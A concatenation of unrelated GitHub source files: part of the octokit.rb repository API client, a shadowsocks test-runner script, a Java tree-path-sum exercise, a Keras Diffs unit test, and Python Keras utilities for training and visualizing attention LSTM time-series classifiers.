def add_deploy_key(repo, title, key, options = {})
post "#{Repository.path repo}/keys", options.merge(:title => title, :key => key)
end
# Edit a deploy key
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param id [Integer] Deploy key ID.
# @param options [Hash] Attributes to edit.
# @option title [String] Key title.
# @option key [String] Public key.
# @return [Sawyer::Resource] Updated deploy key.
# @deprecated This method is no longer supported in the API
# @see https://developer.github.com/changes/2014-02-24-finer-grained-scopes-for-ssh-keys/
# @see https://developer.github.com/v3/repos/keys/#edit
# @example Update the key for a deploy key.
# @client.edit_deploy_key('octokit/octokit.rb', 8675309, :key => 'ssh-rsa BBB...')
# @example
# @client.update_deploy_key('octokit/octokit.rb', 8675309, :title => 'Uber', :key => 'ssh-rsa BBB...'))
def edit_deploy_key(repo, id, options)
patch "#{Repository.path repo}/keys/#{id}", options
end
alias :update_deploy_key :edit_deploy_key
# Remove deploy key from a repo
#
# Requires authenticated client.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param id [Integer] Id of the deploy key to remove.
# @return [Boolean] True if key removed, false otherwise.
# @see https://developer.github.com/v3/repos/keys/#delete
# @example
# @client.remove_deploy_key('octokit/octokit.rb', 100000)
def remove_deploy_key(repo, id, options = {})
boolean_from_response :delete, "#{Repository.path repo}/keys/#{id}", options
end
# List collaborators
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing collaborating users.
# @see https://developer.github.com/v3/repos/collaborators/#list
# @example
# Octokit.collaborators('octokit/octokit.rb')
# @example
# Octokit.collabs('octokit/octokit.rb')
# @example
# @client.collabs('octokit/octokit.rb')
def collaborators(repo, options = {})
paginate "#{Repository.path repo}/collaborators", options
end
alias :collabs :collaborators
# Add collaborator to repo
#
# Requires authenticated client.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param collaborator [String] Collaborator GitHub username to add.
# @return [Boolean] True if collaborator added, false otherwise.
# @see https://developer.github.com/v3/repos/collaborators/#add-collaborator
# @example
# @client.add_collaborator('octokit/octokit.rb', 'holman')
# @example
# @client.add_collab('octokit/octokit.rb', 'holman')
def add_collaborator(repo, collaborator, options = {})
boolean_from_response :put, "#{Repository.path repo}/collaborators/#{collaborator}", options
end
alias :add_collab :add_collaborator
# Remove collaborator from repo.
#
# Requires authenticated client.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param collaborator [String] Collaborator GitHub username to remove.
# @return [Boolean] True if collaborator removed, false otherwise.
# @see https://developer.github.com/v3/repos/collaborators/#remove-collaborator
# @example
# @client.remove_collaborator('octokit/octokit.rb', 'holman')
# @example
# @client.remove_collab('octokit/octokit.rb', 'holman')
def remove_collaborator(repo, collaborator, options = {})
boolean_from_response :delete, "#{Repository.path repo}/collaborators/#{collaborator}", options
end
alias :remove_collab :remove_collaborator
# Checks if a user is a collaborator for a repo.
#
# Requires authenticated client.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param collaborator [String] Collaborator GitHub username to check.
# @return [Boolean] True if user is a collaborator, false otherwise.
# @see https://developer.github.com/v3/repos/collaborators/#get
# @example
# @client.collaborator?('octokit/octokit.rb', 'holman')
def collaborator?(repo, collaborator, options={})
boolean_from_response :get, "#{Repository.path repo}/collaborators/#{collaborator}", options
end
# List teams for a repo
#
# Requires authenticated client that is an owner or collaborator of the repo.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing teams.
# @see https://developer.github.com/v3/repos/#list-teams
# @example
# @client.repository_teams('octokit/pengwynn')
# @example
# @client.repo_teams('octokit/pengwynn')
# @example
# @client.teams('octokit/pengwynn')
def repository_teams(repo, options = {})
paginate "#{Repository.path repo}/teams", options
end
alias :repo_teams :repository_teams
alias :teams :repository_teams
# List contributors to a repo
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param anon [Boolean] Set true to include anonymous contributors.
# @return [Array<Sawyer::Resource>] Array of hashes representing users.
# @see https://developer.github.com/v3/repos/#list-contributors
# @example
# Octokit.contributors('octokit/octokit.rb', true)
# @example
# Octokit.contribs('octokit/octokit.rb')
# @example
# @client.contribs('octokit/octokit.rb')
def contributors(repo, anon = nil, options = {})
options[:anon] = 1 if anon.to_s[/1|true/]
paginate "#{Repository.path repo}/contributors", options
end
alias :contribs :contributors
# List stargazers of a repo
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing users.
# @see https://developer.github.com/v3/activity/starring/#list-stargazers
# @example
# Octokit.stargazers('octokit/octokit.rb')
# @example
# @client.stargazers('octokit/octokit.rb')
def stargazers(repo, options = {})
paginate "#{Repository.path repo}/stargazers", options
end
# @deprecated Use {#stargazers} instead
#
# List watchers of repo.
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing users.
# @see https://developer.github.com/v3/repos/watching/#list-watchers
# @example
# Octokit.watchers('octokit/octokit.rb')
# @example
# @client.watchers('octokit/octokit.rb')
def watchers(repo, options = {})
paginate "#{Repository.path repo}/watchers", options
end
# List forks
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing repos.
# @see https://developer.github.com/v3/repos/forks/#list-forks
# @example
# Octokit.forks('octokit/octokit.rb')
# @example
# Octokit.network('octokit/octokit.rb')
# @example
# @client.forks('octokit/octokit.rb')
def forks(repo, options = {})
paginate "#{Repository.path repo}/forks", options
end
alias :network :forks
# List languages of code in the repo.
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of Hashes representing languages.
# @see https://developer.github.com/v3/repos/#list-languages
# @example
# Octokit.languages('octokit/octokit.rb')
# @example
# @client.languages('octokit/octokit.rb')
def languages(repo, options = {})
paginate "#{Repository.path repo}/languages", options
end
# List tags
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing tags.
# @see https://developer.github.com/v3/repos/#list-tags
# @example
# Octokit.tags('octokit/octokit.rb')
# @example
# @client.tags('octokit/octokit.rb')
def tags(repo, options = {})
paginate "#{Repository.path repo}/tags", options
end
# List branches
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing branches.
# @see https://developer.github.com/v3/repos/#list-branches
# @example
# Octokit.branches('octokit/octokit.rb')
# @example
# @client.branches('octokit/octokit.rb')
def branches(repo, options = {})
paginate "#{Repository.path repo}/branches", options
end
# Get a single branch from a repository
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param branch [String] Branch name
# @return [Sawyer::Resource] The branch requested, if it exists
# @see https://developer.github.com/v3/repos/#get-branch
# @example Get branch 'master` from octokit/octokit.rb
# Octokit.branch("octokit/octokit.rb", "master")
def branch(repo, branch, options = {})
get "#{Repository.path repo}/branches/#{branch}", options
end
alias :get_branch :branch
# Lock a single branch from a repository
#
# Requires authenticated client
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param branch [String] Branch name
# @param required_status_checks [Hash]
# @return [Sawyer::Resource] The protected branch
# @see https://developer.github.com/v3/repos/#enabling-and-disabling-branch-protection
# @example
# @client.protect_branch('octokit/octokit.rb', 'master', foo)
def protect_branch(repo, branch, required_status_checks = {}, options = {})
if !required_status_checks.empty?
required_status_checks = { :required_status_checks => required_status_checks }
end
protection = { :protection => { :enabled => true }.merge(required_status_checks) }
options = ensure_api_media_type(:branch_protection, options.merge(protection))
patch "#{Repository.path repo}/branches/#{branch}", options
end
# Unlock a single branch from a repository
#
# Requires authenticated client
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param branch [String] Branch name
# @return [Sawyer::Resource] The unprotected branch
# @see https://developer.github.com/v3/repos/#enabling-and-disabling-branch-protection
# @example
# @client.unprotect_branch('octokit/octokit.rb', 'master')
def unprotect_branch(repo, branch, options = {})
protection = { :protection => { :enabled => false } }
options = ensure_api_media_type(:branch_protection, options.merge(protection))
patch "#{Repository.path repo}/branches/#{branch}", options
end
# List users available for assigning to issues.
#
# Requires authenticated client for private repos.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of hashes representing users.
# @see https://developer.github.com/v3/issues/assignees/#list-assignees
# @example
# Octokit.repository_assignees('octokit/octokit.rb')
# @example
# Octokit.repo_assignees('octokit/octokit.rb')
# @example
# @client.repository_assignees('octokit/octokit.rb')
def repository_assignees(repo, options = {})
paginate "#{Repository.path repo}/assignees", options
end
alias :repo_assignees :repository_assignees
# Check to see if a particular user is an assignee for a repository.
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param assignee [String] User login to check
# @return [Boolean] True if assignable on project, false otherwise.
# @see https://developer.github.com/v3/issues/assignees/#check-assignee
# @example
# Octokit.check_assignee('octokit/octokit.rb', 'andrew')
def check_assignee(repo, assignee, options = {})
boolean_from_response :get, "#{Repository.path repo}/assignees/#{assignee}", options
end
# List watchers subscribing to notifications for a repo
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Array<Sawyer::Resource>] Array of users watching.
# @see https://developer.github.com/v3/activity/watching/#list-watchers
# @example
# @client.subscribers("octokit/octokit.rb")
def subscribers(repo, options = {})
paginate "#{Repository.path repo}/subscribers", options
end
# Get a repository subscription
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Sawyer::Resource] Repository subscription.
# @see https://developer.github.com/v3/activity/watching/#get-a-repository-subscription
# @example
# @client.subscription("octokit/octokit.rb")
def subscription(repo, options = {})
get "#{Repository.path repo}/subscription", options
end
# Update repository subscription
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @param options [Hash]
#
# @option options [Boolean] :subscribed Determines if notifications
# should be received from this repository.
# @option options [Boolean] :ignored Deterimines if all notifications
# should be blocked from this repository.
# @return [Sawyer::Resource] Updated repository subscription.
# @see https://developer.github.com/v3/activity/watching/#set-a-repository-subscription
# @example Subscribe to notifications for a repository
# @client.update_subscription("octokit/octokit.rb", {subscribed: true})
def update_subscription(repo, options = {})
put "#{Repository.path repo}/subscription", options
end
# Delete a repository subscription
#
# @param repo [Integer, String, Hash, Repository] A GitHub repository.
# @return [Boolean] True if subscription deleted, false otherwise.
# @see https://developer.github.com/v3/activity/watching/#delete-a-repository-subscription
#
# @example
# @client.delete_subscription("octokit/octokit.rb")
def delete_subscription(repo, options = {})
boolean_from_response :delete, "#{Repository.path repo}/subscription", options
end
end
end
end
| {
"pile_set_name": "Github"
} |
#!/bin/bash
result=0
function run_test {
printf '\e[0;36m'
echo "running test: $command $@"
printf '\e[0m'
$command "$@"
status=$?
if [ $status -ne 0 ]; then
printf '\e[0;31m'
echo "test failed: $command $@"
printf '\e[0m'
echo
result=1
else
printf '\e[0;32m'
echo OK
printf '\e[0m'
echo
fi
return 0
}
python --version
coverage erase
mkdir tmp
run_test pep8 --ignore=E402 .
run_test pyflakes .
run_test coverage run tests/nose_plugin.py -v
run_test python setup.py sdist
run_test tests/test_daemon.sh
run_test python tests/test.py --with-coverage -c tests/aes.json
run_test python tests/test.py --with-coverage -c tests/aes-ctr.json
run_test python tests/test.py --with-coverage -c tests/aes-cfb1.json
run_test python tests/test.py --with-coverage -c tests/aes-cfb8.json
run_test python tests/test.py --with-coverage -c tests/rc4-md5.json
run_test python tests/test.py --with-coverage -c tests/salsa20.json
run_test python tests/test.py --with-coverage -c tests/chacha20.json
run_test python tests/test.py --with-coverage -c tests/table.json
run_test python tests/test.py --with-coverage -c tests/server-multi-ports.json
run_test python tests/test.py --with-coverage -s tests/aes.json -c tests/client-multi-server-ip.json
run_test python tests/test.py --with-coverage -s tests/server-multi-passwd.json -c tests/server-multi-passwd-client-side.json
run_test python tests/test.py --with-coverage -c tests/workers.json
run_test python tests/test.py --with-coverage -s tests/ipv6.json -c tests/ipv6-client-side.json
run_test python tests/test.py --with-coverage -b "-m rc4-md5 -k testrc4 -s 127.0.0.1 -p 8388 -q" -a "-m rc4-md5 -k testrc4 -s 127.0.0.1 -p 8388 -l 1081 -vv"
run_test python tests/test.py --with-coverage -b "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 --workers 1" -a "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 -l 1081 -t 30 -qq -b 127.0.0.1"
run_test python tests/test.py --with-coverage --should-fail --url="http://127.0.0.1/" -b "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 --forbidden-ip=127.0.0.1,::1,8.8.8.8" -a "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 -l 1081 -t 30 -b 127.0.0.1"
# test if DNS works
run_test python tests/test.py --with-coverage -c tests/aes.json --url="https://clients1.google.com/generate_204"
# test localhost is in the forbidden list by default
run_test python tests/test.py --with-coverage --should-fail --tcp-only --url="http://127.0.0.1/" -b "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388" -a "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 -l 1081 -t 30 -b 127.0.0.1"
# test localhost is available when forbidden list is empty
run_test python tests/test.py --with-coverage --tcp-only --url="http://127.0.0.1/" -b "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 --forbidden-ip=" -a "-m aes-256-cfb -k testrc4 -s 127.0.0.1 -p 8388 -l 1081 -t 30 -b 127.0.0.1"
if [ -f /proc/sys/net/ipv4/tcp_fastopen ] ; then
if [ 3 -eq `cat /proc/sys/net/ipv4/tcp_fastopen` ] ; then
# we have to run it twice:
# the first time there's no syn cookie
# the second time there is syn cookie
run_test python tests/test.py --with-coverage -c tests/fastopen.json
run_test python tests/test.py --with-coverage -c tests/fastopen.json
fi
fi
run_test tests/test_large_file.sh
run_test tests/test_udp_src.sh
run_test tests/test_command.sh
coverage combine && coverage report --include=shadowsocks/*
rm -rf htmlcov
rm -rf tmp
coverage html --include=shadowsocks/*
coverage report --include=shadowsocks/* | tail -n1 | rev | cut -d' ' -f 1 | rev > /tmp/shadowsocks-coverage
exit $result
| {
"pile_set_name": "Github"
} |
# Paths with Sum II
You are given a binary tree in which each node contains an integer value (which might be positive or negative). Design an algorithm to count the number of paths that sum to a given value. The path does not need to start or end at the root or a leaf, but it must go downwards (traveling only from parent nodes to child nodes)
## Solution
暂时只想到暴力法
## Code
```java
// Brute Force
int countPath(TreeNode root, int sum){
if (root == null)
return 0;
int pathsRoot = countPathFromNode(root, sum, 0);
int pathsLeft = countPath(root.left, sum);
int pathsRight = countPath(root.right, sum);
return pathsRoot + pathsLeft + pathsRight;
}
int countPathFromNode(TreeNode node, int sum, int curSum){
if (node == null){
return 0;
}
curSum += node.data;
int totalPath = 0;
if (curSum == sum){
totalPath++;
}
totalPath += countPathFromNode(node.left, sum, curSum);
totalPath += countPathFromNode(node.right, sum, curSum);
return totalPath;
}
```
| {
"pile_set_name": "Github"
} |
package io.improbable.keanu.vertices.tensor.number.floating.dbl.nonprobabilistic.diff;
import io.improbable.keanu.distributions.hyperparam.Diff;
import io.improbable.keanu.distributions.hyperparam.Diffs;
import io.improbable.keanu.tensor.dbl.DoubleTensor;
import org.junit.Before;
import org.junit.Test;
import java.util.NoSuchElementException;
import static io.improbable.keanu.distributions.hyperparam.Diffs.MU;
import static org.junit.Assert.assertTrue;
public class DiffTest {
Diffs diffs;
@Before
public void initialiseDiffs() {
diffs = new Diffs();
}
@Test
public void youCanGetADiffByName() {
DoubleTensor muDiffValue = DoubleTensor.scalar(0.1);
diffs.put(MU, muDiffValue);
Diff mu = diffs.get(MU);
assertTrue(mu.getName().equals(MU.getName()));
assertTrue(mu.getValue() == muDiffValue);
}
@Test(expected = NoSuchElementException.class)
public void itThrowsIfYouAskForAValueThatsAbsent() {
diffs.get(MU);
}
@Test(expected = IllegalArgumentException.class)
public void itThrowsIfYouTryToAddTheSameDiffTwice() {
DoubleTensor muDiffValue = DoubleTensor.scalar(0.1);
diffs.put(MU, muDiffValue);
diffs.put(MU, muDiffValue);
}
@Test(expected = IllegalArgumentException.class)
public void itThrowsIfYouTryToAddTwoDiffsWithTheSameName() {
diffs.put(MU, DoubleTensor.scalar(0.1));
diffs.put(MU, DoubleTensor.scalar(0.2));
}
}
| {
"pile_set_name": "Github"
} |
import os
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.ticker import FuncFormatter
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import GridSearchCV, train_test_split
from skimage.transform import resize
import warnings
from keras.models import Model
from keras.layers import Permute
from keras.optimizers import Adam
from keras.utils import to_categorical
from keras.preprocessing.sequence import pad_sequences
from keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, LearningRateScheduler
from keras.wrappers.scikit_learn import KerasClassifier
from keras import backend as K
from utils.generic_utils import load_dataset_at, calculate_dataset_metrics, cutoff_choice, \
cutoff_sequence, plot_dataset
from utils.constants import MAX_SEQUENCE_LENGTH_LIST, TRAIN_FILES
mpl.style.use('seaborn-paper')
warnings.simplefilter('ignore', category=DeprecationWarning)
if not os.path.exists('weights/'):
os.makedirs('weights/')
def train_model(model: Model, dataset_id, dataset_prefix, epochs=50, batch_size=128, val_subset=None,
cutoff=None, normalize_timeseries=False, learning_rate=1e-3):
"""
Trains a provided Model, given a dataset id.
Args:
model: A Keras Model.
dataset_id: Integer id representing the dataset index containd in
`utils/constants.py`.
dataset_prefix: Name of the dataset. Used for weight saving.
epochs: Number of epochs to train.
batch_size: Size of each batch for training.
val_subset: Optional integer id to subset the test set. To be used if
the test set evaluation time significantly surpasses training time
per epoch.
cutoff: Optional integer which slices of the first `cutoff` timesteps
from the input signal.
normalize_timeseries: Bool / Integer. Determines whether to normalize
the timeseries.
If False, does not normalize the time series.
If True / int not equal to 2, performs standard sample-wise
z-normalization.
If 2: Performs full dataset z-normalization.
learning_rate: Initial learning rate.
"""
X_train, y_train, X_test, y_test, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
max_nb_words, sequence_length = calculate_dataset_metrics(X_train)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
X_train, X_test = cutoff_sequence(X_train, X_test, choice, dataset_id, sequence_length)
if not is_timeseries:
X_train = pad_sequences(X_train, maxlen=MAX_SEQUENCE_LENGTH_LIST[dataset_id], padding='post', truncating='post')
X_test = pad_sequences(X_test, maxlen=MAX_SEQUENCE_LENGTH_LIST[dataset_id], padding='post', truncating='post')
classes = np.unique(y_train)
le = LabelEncoder()
y_ind = le.fit_transform(y_train.ravel())
recip_freq = len(y_train) / (len(le.classes_) *
np.bincount(y_ind).astype(np.float64))
class_weight = recip_freq[le.transform(classes)]
print("Class weights : ", class_weight)
y_train = to_categorical(y_train, len(np.unique(y_train)))
y_test = to_categorical(y_test, len(np.unique(y_test)))
if is_timeseries:
factor = 1. / np.cbrt(2)
else:
factor = 1. / np.sqrt(2)
path_splits = os.path.split(dataset_prefix)
if len(path_splits) > 1:
base_path = os.path.join('weights', *path_splits)
if not os.path.exists(base_path):
os.makedirs(base_path)
base_path = os.path.join(base_path, path_splits[-1])
else:
all_weights_path = os.path.join('weights', dataset_prefix)
if not os.path.exists(all_weights_path):
os.makedirs(all_weights_path)
model_checkpoint = ModelCheckpoint("./weights/%s_weights.h5" % dataset_prefix, verbose=1,
monitor='loss', save_best_only=True, save_weights_only=True)
reduce_lr = ReduceLROnPlateau(monitor='loss', patience=100, mode='auto',
factor=factor, cooldown=0, min_lr=1e-4, verbose=2)
callback_list = [model_checkpoint, reduce_lr]
optm = Adam(lr=learning_rate)
model.compile(optimizer=optm, loss='categorical_crossentropy', metrics=['accuracy'])
if val_subset is not None:
X_test = X_test[:val_subset]
y_test = y_test[:val_subset]
model.fit(X_train, y_train, batch_size=batch_size, epochs=epochs, callbacks=callback_list,
class_weight=class_weight, verbose=2, validation_data=(X_test, y_test))
def evaluate_model(model: Model, dataset_id, dataset_prefix, batch_size=128, test_data_subset=None,
cutoff=None, normalize_timeseries=False):
"""
Evaluates a given Keras Model on the provided dataset.
Args:
model: A Keras Model.
dataset_id: Integer id representing the dataset index containd in
`utils/constants.py`.
dataset_prefix: Name of the dataset. Used for weight saving.
batch_size: Size of each batch for evaluation.
test_data_subset: Optional integer id to subset the test set. To be used if
the test set evaluation time is significantly.
cutoff: Optional integer which slices of the first `cutoff` timesteps
from the input signal.
normalize_timeseries: Bool / Integer. Determines whether to normalize
the timeseries.
If False, does not normalize the time series.
If True / int not equal to 2, performs standard sample-wise
z-normalization.
If 2: Performs full dataset z-normalization.
Returns:
The test set accuracy of the model.
"""
_, _, X_test, y_test, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
max_nb_words, sequence_length = calculate_dataset_metrics(X_test)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
_, X_test = cutoff_sequence(None, X_test, choice, dataset_id, sequence_length)
if not is_timeseries:
X_test = pad_sequences(X_test, maxlen=MAX_SEQUENCE_LENGTH_LIST[dataset_id], padding='post', truncating='post')
y_test = to_categorical(y_test, len(np.unique(y_test)))
optm = Adam(lr=1e-3)
model.compile(optimizer=optm, loss='categorical_crossentropy', metrics=['accuracy'])
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
print("Weights loaded from ", "./weights/%s_weights.h5" % dataset_prefix)
if test_data_subset is not None:
X_test = X_test[:test_data_subset]
y_test = y_test[:test_data_subset]
print("\nEvaluating : ")
loss, accuracy = model.evaluate(X_test, y_test, batch_size=batch_size)
print()
print("Final Accuracy : ", accuracy)
return accuracy
def loss_model(model: Model, dataset_id, dataset_prefix, batch_size=128, train_data_subset=None,
cutoff=None, normalize_timeseries=False):
X_train, y_train, _, _, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
y_train = to_categorical(y_train, len(np.unique(y_train)))
optm = Adam(lr=1e-3)
model.compile(optimizer=optm, loss='categorical_crossentropy', metrics=['accuracy'])
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
print("Weights loaded from ", "./weights/%s_weights.h5" % dataset_prefix)
if train_data_subset is not None:
X_train = X_train[:train_data_subset]
y_train = y_train[:train_data_subset]
print("\nEvaluating : ")
loss, accuracy = model.evaluate(X_train, y_train, batch_size=batch_size)
print()
print("Final Loss : ", loss)
return loss
def set_trainable(layer, value):
"""
Sets the layers of the Model to be trainable or not.
Args:
layer: can be a single Layer of a Model, or an entire Model.
value: True or False.
"""
layer.trainable = value
# case: container
if hasattr(layer, 'layers'):
for l in layer.layers:
set_trainable(l, value)
# case: wrapper (which is a case not covered by the PR)
if hasattr(layer, 'layer'):
set_trainable(layer.layer, value)
def build_function(model, layer_names=None, outputs=None):
"""
Builds a Keras Function which retrieves the output of a Layer.
Args:
model: Keras Model.
layer_names: Name of the layer whose output is required.
outputs: Output tensors.
Returns:
List of Keras Functions.
"""
inp = model.input
if layer_names is not None and (type(layer_names) != list and type(layer_names) != tuple):
layer_names = [layer_names]
if outputs is None:
if layer_names is None:
outputs = [layer.output for layer in model.layers] # all layer outputs
else:
outputs = [layer.output for layer in model.layers if layer.name in layer_names]
else:
outputs = outputs
funcs = [K.function([inp] + [K.learning_phase()], [out]) for out in outputs] # evaluation functions
return funcs
def get_outputs(model, inputs, eval_functions, verbose=False):
"""
Gets the outputs of the Keras model.
Args:
model: Unused.
inputs: Input numpy arrays.
eval_functions: Keras functions for evaluation.
verbose: Whether to print evaluation metrics.
Returns:
List of outputs of the Keras Model.
"""
if verbose: print('----- activations -----')
outputs = []
layer_outputs = [func([inputs, 1.])[0] for func in eval_functions]
for layer_activations in layer_outputs:
outputs.append(layer_activations)
return outputs
def visualize_context_vector(model: Model, dataset_id, dataset_prefix, cutoff=None, limit=None,
normalize_timeseries=False, visualize_sequence=True, visualize_classwise=False):
"""
Visualize the Context Vector of the Attention LSTM.
Args:
model: an Attention LSTM-FCN Model.
dataset_id: Integer id representing the dataset index containd in
`utils/constants.py`.
dataset_prefix: Name of the dataset. Used for weight saving.
batch_size: Size of each batch for evaluation.
test_data_subset: Optional integer id to subset the test set. To be used if
the test set evaluation time is significantly.
cutoff: Optional integer which slices of the first `cutoff` timesteps
from the input signal.
limit: Number of samples to be visualized in one plot.
normalize_timeseries: Bool / Integer. Determines whether to normalize
the timeseries.
If False, does not normalize the time series.
If True / int not equal to 2, performs standard sample-wise
z-normalization.
If 2: Performs full dataset z-normalization.
visualize_sequence: Bool flag, whetehr to visualize the sequence attended to
by the Context Vector or just the Context Vector itself.
visualize_classwise: Bool flag. Wheter to visualize the samples
seperated by class. When doing so, `limit` is multiplied by
the number of classes so it is better to set `limit` to 1 in
such cases.
"""
X_train, y_train, X_test, y_test, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
_, sequence_length = calculate_dataset_metrics(X_train)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
X_train, X_test = cutoff_sequence(X_train, X_test, choice, dataset_id, sequence_length)
attn_lstm_layer = [(i, layer) for (i, layer) in enumerate(model.layers)
if layer.__class__.__name__ == 'AttentionLSTM']
if len(attn_lstm_layer) == 0:
raise AttributeError('Provided model does not have an Attention layer')
else:
i, attn_lstm_layer = attn_lstm_layer[0] # use first attention lstm layer only
attn_lstm_layer.return_attention = True
model.layers[i] = attn_lstm_layer
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
attention_output = model.layers[i].call(model.input)
eval_functions = build_function(model, attn_lstm_layer.name, outputs=[attention_output])
train_attention_vectors = []
test_attention_vectors = []
output_shape = [X_train.shape[-1], 1, 1]
for i in range(X_train.shape[0]):
activations = get_outputs(model,
X_train[i, :, :][np.newaxis, ...],
eval_functions,
verbose=False)[0]
# print("activations", activations.shape)
attention_vector = activations.reshape((-1, 1, 1))
attention_vector = (attention_vector - attention_vector.min()) / (
attention_vector.max() - attention_vector.min())
attention_vector = (attention_vector * 2.) - 1.
attention_vector = resize(attention_vector, output_shape, mode='reflect', anti_aliasing=True)
attention_vector = attention_vector.reshape([1, -1])
train_attention_vectors.append(attention_vector)
for i in range(X_test.shape[0]):
activations = get_outputs(model,
X_test[i, :, :][np.newaxis, ...],
eval_functions,
verbose=False)[0]
# print("activations", activations.shape)
attention_vector = activations.reshape((-1, 1, 1))
attention_vector = (attention_vector - attention_vector.min()) / (
attention_vector.max() - attention_vector.min())
attention_vector = (attention_vector * 2.) - 1.
attention_vector = resize(attention_vector, output_shape, mode='reflect', anti_aliasing=True)
attention_vector = attention_vector.reshape([1, -1])
test_attention_vectors.append(attention_vector)
train_attention_vectors = np.array(train_attention_vectors)
test_attention_vectors = np.array(test_attention_vectors)
print("Train Attention Vectors Shape :", train_attention_vectors.shape)
print("Test Attentin Vectors Shape :", test_attention_vectors.shape)
if visualize_sequence:
# plot input sequence part that is paid attention too in detail
X_train_attention = train_attention_vectors * X_train
X_test_attention = test_attention_vectors * X_test
plot_dataset(dataset_id, seed=1, limit=limit, cutoff=cutoff,
normalize_timeseries=normalize_timeseries, plot_data=(X_train, y_train, X_test, y_test,
X_train_attention, X_test_attention),
type='Context', plot_classwise=visualize_classwise)
else:
# plot only attention chart
choice = np.random.randint(0, train_attention_vectors.shape[0])
train_df = pd.DataFrame({'attention (%)': train_attention_vectors[choice, 0]},
index=range(train_attention_vectors.shape[-1]))
train_df.plot(kind='bar',
title='Attention Mechanism (Train) as '
'a function of input'
' dimensions. Class = %d' % (
y_train[choice]
))
plt.show()
def write_context_vector(model: Model, dataset_id, dataset_prefix, cutoff=None, limit=None,
normalize_timeseries=False, visualize_sequence=True, visualize_classwise=False):
""" Same as visualize_context_vector, but writes the context vectors to a file. Unused. """
X_train, y_train, X_test, y_test, is_timeseries = load_dataset_at(dataset_id,
normalize_timeseries=normalize_timeseries)
_, sequence_length = calculate_dataset_metrics(X_train)
if sequence_length != MAX_SEQUENCE_LENGTH_LIST[dataset_id]:
if cutoff is None:
choice = cutoff_choice(dataset_id, sequence_length)
else:
assert cutoff in ['pre', 'post'], 'Cutoff parameter value must be either "pre" or "post"'
choice = cutoff
if choice not in ['pre', 'post']:
return
else:
X_train, X_test = cutoff_sequence(X_train, X_test, choice, dataset_id, sequence_length)
attn_lstm_layer = [(i, layer) for (i, layer) in enumerate(model.layers)
if layer.__class__.__name__ == 'AttentionLSTM']
if len(attn_lstm_layer) == 0:
raise AttributeError('Provided model does not have an Attention layer')
else:
i, attn_lstm_layer = attn_lstm_layer[0] # use first attention lstm layer only
attn_lstm_layer.return_attention = True
model.layers[i] = attn_lstm_layer
model.load_weights("./weights/%s_weights.h5" % dataset_prefix)
attention_output = model.layers[i].call(model.input)
eval_functions = build_function(model, attn_lstm_layer.name, outputs=[attention_output])
train_attention_vectors = []
test_attention_vectors = []
